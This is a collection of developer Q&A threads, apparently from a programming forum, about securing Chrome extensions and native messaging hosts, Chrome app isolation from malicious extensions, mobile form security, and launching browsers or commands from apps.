I am developing a GWT based client server web application.
The application installs a web site on the IIS.
When clients first browse to the web site, they need to run a local installation, which installs a local process and a NPAPI plugin on the client computer.
The client runs in browsers such as IE, Chrome and Firefox,
and uses the NPAPI plugin to send messages to the local process.
The local process is used for accessing the file system, registry, etc.
In order to prevent other web sites from using the NPAPI plugin,
When a user first login, the server sends him a hash of a string which contains the URL of the site + some other data.
The NPAPI plugin has access to the current URL of the browser, and also creates the same hash and compares the two.
Due to Chrome upcoming end of support of NPAPI plugins, I am trying to replace the plugin with a Chrome extension, and a native messaging host.
The extension can't be limited to a certain domain because it can be used from many domains.
I am trying to figure out a way to prevent other web sites from using the extension to send messages to the native host but can't find a way to do it.
Does anyone have an idea how I can accomplish that?
Any advice would be greatly appreciated, thanks.
Have you considered having the extension be limited to a specific domain, and then having the other domains iframe that domain and communicate via postMessage? You could have a whitelist of domains in the JS of the iframe, and validate the message origin against that list.
Related
For security considerations I am wondering if Chrome extensions had access to an app. I design a Chrome App which handles sensitive data. As far as I understand it, that app runs in a sandboxed environment which should be fairly isolated. If a user had by mistake installed a malicious Chrome extension, would that extension be able to intercept/modify any of the sensitive data in the app?
Please note that I do not consider other ways of interceptions outside of the Chrome environment, e.g. some virus that allows someone to get root access or alike. I would just like to understand to what degree a Chrome app is more susceptible to interception than a standard stand-alone application.
Sebastian
On one hand, extensions cannot touch your app's windows (as in, inspection / script injection) in the default environment, even with "debugger" permission. Your "local" data should be safe.
On the other, I tested it and conclude that webRequest API will catch all XHRs you send.
This includes headers for both request and response, and request body. Response body is currently not available for inspection; however, a malicious extension can perform a redirect, modify your request or cancel it.
This was deemed a security issue; as of Chrome 45, extensions can no longer intercept traffic from other extensions and apps. Hosted apps were accidentally included too, but it's a bug that will be fixed soon - traffic from hosted apps will be open to webRequest as normal.
I don't know any other possibility for an extension to snoop on an app (without any anomalous chrome://flag configuration).
Extensions or other apps cannot access data inside other extensions or apps. An exception may be data in the syncFileSystem api, since an extension could be granted access to the user's Gdrive.
I would greatly appreciate some help with the following problem.
I am attempting to build an app with HTML/CSS/JQM that I plan to wrap with PhoneGap to package as a native app for deployment on Android & iOS Platforms.
The app will be basically a form for users to input information which upon submit will be posted to an email using PHP on our web server. It is of the utmost importance that the information is encrypted between the user device and our web server.
I have planned to do this by having a single terms & conditions page packaged with the native app, with the 'accept' button loading the 'form' page on the web server.
I would like to make it impossible to access the hosted 'form' page via a web browser (i.e. the only way to access the page is via the native app).
What I would like to do is to have the native app automatically log in to the web server, so that the user does not have to go through a registration process.
I have considered using Wordpress, Drupal or Joomla as a solution but as there will only ever be a single html page, jquery, jqm and php form submission scripts on the server - this seems overcomplicated.
It is very important that the hosted files are unable to be hacked as the user information being submitted is of a sensitive nature (e.g. financial information). Also the connection between the native app and the host server must be SSL.
Would a .htaccess / .htpasswd restriction be the best way to go about this?
Any advice would be greatly appreciated, thanks.
Does anyone know if this is possible in J2ME;
I want to have an app that simply launches a browser when opened and directs the browser to a specific web page.
If so, is it widely supported.
You can use javax.microedition.midlet.MIDlet.platformRequest() to launch the browser on almost all phones that support JavaME. This article tells more about invoking platform services such as browser.
I'm really confused. I want to make a Chrome Extension that can update a user's Google Calendar, what kind of program should I register under Google API?
Is it Web App? But I don't plan to have a server to host anything because Chrome Extensions are in the browser itself.
I really don't think it's a service account, but if it is, somebody enlighten me!
So that leaves installed applications?
Well, Google Extensions and Google API are very different in nature, and they don't have a special way to comunicate themselves.
Chrome Extensions are javascript code running in the browser allowed by a Chrome user, with more rights than a normal page; while Google API is accessed by server code, just as Google Apps Scripts (javascript code running in a Google server with some Google user's right).
I have created an App for google chrome which just opens a web page. I am new in the topic
of Apps. I was thinking if it is possible to execute some linux command by using an App
in google chrome. For instance, an App which can open a terminal or open a program
installed in my machine like Gimp, Kate, Libre Office ...
From the instructions in the web page of google I saw that the only actions for an App
are limited to open a web address but I dont know if it is possible to extend the capabilities
of the Apps,
Regards.
Aren't apps sandboxed into the Google Chrome Process to ensure they can't affect other processes and for other security reasons. If so, you won't be able to execute programs/commands or view the User's Files unless you use some workaround such as Google's Native Client.
Google has locked down capabilities to stop malicious Web Apps from executing code and bringing malware and exploits.
You can write a NPAPI Plugin or a custom URI scheme associated to Unix terminal.